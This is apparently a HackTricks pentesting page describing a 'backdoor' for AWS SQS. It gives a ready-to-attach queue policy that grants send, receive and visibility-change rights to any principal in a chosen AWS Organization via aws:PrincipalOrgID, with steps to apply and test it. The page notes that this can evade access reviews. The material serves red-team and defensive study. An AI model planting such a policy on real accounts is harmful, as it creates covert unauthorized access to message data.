AWS - SQS OrgID Policy Backdoor

{{#include ../../../../banners/hacktricks-training.md}}

Abuse an SQS queue resource policy to silently grant Send, Receive and ChangeMessageVisibility to any principal that belongs to a target AWS Organization using the condition aws:PrincipalOrgID. This creates an org-scoped hidden path that often evades controls that only look for explicit account or role ARNs or star principals.

Backdoor policy (attach to the SQS queue policy)

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "OrgScopedBackdoor",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:ReceiveMessage",
        "sqs:SendMessage",
        "sqs:ChangeMessageVisibility",
        "sqs:GetQueueAttributes"
      ],
      "Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
      "Condition": {
        "StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
      }
    }
  ]
}

Steps

• Obtain the Organization ID with AWS Organizations API.
• Get the SQS queue ARN and set the queue policy including the statement above.
• From any principal that belongs to that Organization, send and receive a message in the queue to validate access.

Impact

• Organization-wide hidden access to read and write SQS messages from any account in the specified AWS Organization.

{{#include ../../../../banners/hacktricks-training.md}}